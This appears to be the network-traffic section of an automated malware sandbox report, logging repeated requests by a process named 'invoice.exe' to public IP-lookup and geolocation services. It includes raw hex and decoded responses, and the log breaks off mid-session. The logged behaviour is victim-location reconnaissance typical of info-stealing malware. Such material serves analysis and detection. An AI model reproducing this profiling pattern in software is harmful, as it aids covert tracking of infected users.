Oct 1, 2024 06:16:01.918766975 CEST	320	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 04:16:01 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 9df46b6c959af96c6a3d46bcb283686a Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Oct 1, 2024 06:16:02.638540983 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 1, 2024 06:16:02.846812963 CEST	320	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 04:16:02 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: c37f930049e2e5c03683416a467e7ba6 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49738	132.226.247.73	80	7644	C:\Users\user\Desktop\invoice.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 06:16:03.520214081 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 1, 2024 06:16:04.232608080 CEST	320	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 04:16:04 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 31dddab5cc6d474e1dff8173e53900bd Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49742	132.226.247.73	80	7644	C:\Users\user\Desktop\invoice.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 06:16:04.845953941 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 1, 2024 06:16:05.514498949 CEST	320	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 04:16:05 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 3ad93c2aa3163ea02aeb4a87ed944283 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49744	132.226.247.73	80	7644	C:\Users\user\Desktop\invoice.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 06:16:06.203975916 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 1, 2024 06:16:06.894727945 CEST	320	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 04:16:06 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 9a08541c013f6d7719df67079bdfc11a Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49746	132.226.247.73	80	7644	C:\Users\user\Desktop\invoice.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 06:16:07.503449917 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 1, 2024 06:16:08.177732944 CEST	320	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 04:16:08 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 9a32a51aa02dd231abf09d4085751876 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49748	132.226.247.73	80	7644	C:\Users\user\Desktop\invoice.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 06:16:08.833524942 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 1, 2024 06:16:09.497265100 CEST	320	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 04:16:09 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: f499ac69b43380361a5a1a7986d56b8f Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49750	132.226.247.73	80	7644	C:\Users\user\Desktop\invoice.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 06:16:10.123119116 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 1, 2024 06:16:10.791599989 CEST	320	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 04:16:10 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 07d4c92a4d488ef918c4e5915f36998d Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49752	132.226.247.73	80	7644	C:\Users\user\Desktop\invoice.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 06:16:11.523566961 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 1, 2024 06:16:12.258929014 CEST	320	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 04:16:12 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 654221f02cf419814f137ffa1306285e Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49736	188.114.96.3	443	7644	C:\Users\user\Desktop\invoice.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-01 04:16:02 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-01 04:16:02 UTC	676	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 04:16:02 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 72193 Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GU2mVgFhLjISA%2F85VxaqIlOu4n0kc%2FiqLIF67pWnC7HTz2BSSgeGagW6bdplKBNksjKEyHAW49LYqDGl4SppfslcXhdK8AEX4fc7hc2vGGCAH0JR%2FNenYBRn1nudRvtwrOQv6nhe"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cb9a2900da8c32f-EWR
2024-10-01 04:16:02 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-01 04:16:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49737	188.114.96.3	443	7644	C:\Users\user\Desktop\invoice.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-01 04:16:03 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-01 04:16:03 UTC	678	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 04:16:03 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 72194 Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m44T2KvKXqu0gyx%2FvBHkZo3obpi1X9L7AOgYwNpZHqMRbwmUsRP6mOARqOfcR6gbevN8JXZsjRRJZlYC%2BtsK%2FqWfIK2WEawfbeP6g2OZ1uPV5sAea8xuDPVoN%2FR10SRJois6B549"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cb9a2956fed19ff-EWR
2024-10-01 04:16:03 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-01 04:16:03 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49740	188.114.96.3	443	7644	C:\Users\user\Desktop\invoice.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-01 04:16:04 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-01 04:16:04 UTC	678	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 04:16:04 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 72195 Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IPS4hQ90t8Ublk%2FCs5yfuBC72l6tw7WiWdCVgP00gqw4Je5D9HdBRb518%2FVpPibRAGRjxUV01S%2BTyLs%2BxY73GKHsVxGuaeupgjicKsaI1cFAzUVJ25TOkfr9HvNutUqWFhIOahwu"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cb9a29decb81855-EWR
2024-10-01 04:16:04 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-01 04:16:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49743	188.114.96.3	443	7644	C:\Users\user\Desktop\invoice.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-01 04:16:06 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-01 04:16:06 UTC	678	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 04:16:06 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 72197 Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YkwSR0hN75lHIYOvdKb39d1gFnEqv6Mcwg3DL5n%2BJlAefrt1mZ%2FPAAKHwXpbq%2BtDfs0YHd59gfgqb61CdL7RyqfMBHPsPc0Cgfpt8iPOnQh5rBGL0BHcnxtSA8%2FImDZZJ3AZ8Lyj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cb9a2a65c5541ac-EWR
2024-10-01 04:16:06 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-01 04:16:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49745	188.114.96.3	443	7644	C:\Users\user\Desktop\invoice.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-01 04:16:07 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-01 04:16:07 UTC	676	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 04:16:07 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 72198 Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7ArE4a1zAZorOhxNjIKHTV5DsMmjfwuYOuWB7Daxr5INdq9mfQF27BaN6JqnCUtb0BHdfiFq%2Bx3PF54J2ciSAbImSiyUXf5%2FD08musWm7Ecz5%2F8i3WJAtJVHB1IYfEDpv0qfwuM7"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cb9a2ae88be1849-EWR
2024-10-01 04:16:07 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-01 04:16:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49747	188.114.96.3	443	7644	C:\Users\user\Desktop\invoice.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-01 04:16:08 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-01 04:16:08 UTC	674	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 04:16:08 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 72199 Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VbmqtyLYpqYfdVVfIGhXZ7CNqxCQ5J2NgQWtKKBnmBqLFpQRLH3Hg0mOLrMH4VeKvEzaBG%2Fo2kUxMlwK9LH2f4NxHbADZXrl4quO%2B7pATNVYpdjAkmNwc49Nk6HZJ0wAPY9PEiY2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cb9a2b6cba51760-EWR
2024-10-01 04:16:08 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-01 04:16:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49749	188.114.96.3	443	7644	C:\Users\user\Desktop\invoice.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-01 04:16:09 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-01 04:16:10 UTC	708	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 04:16:10 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 72201 Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oihJlAHgt%2FQm1Jbl9Xoz4y5qUDb4kQdMyL9Lk795euFJWGaEl%2B0XJFbo4F1iagKauWeAF1wcAHsmC%2FH3kS9MjzY8zejDV1vCdSYyGkBc6%2FMd1TPXv59kWeBnka2JVaI0VvEZNdpg"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cb9a2bed8dd0cb8-EWR alt-svc: h3=":443"; ma=86400
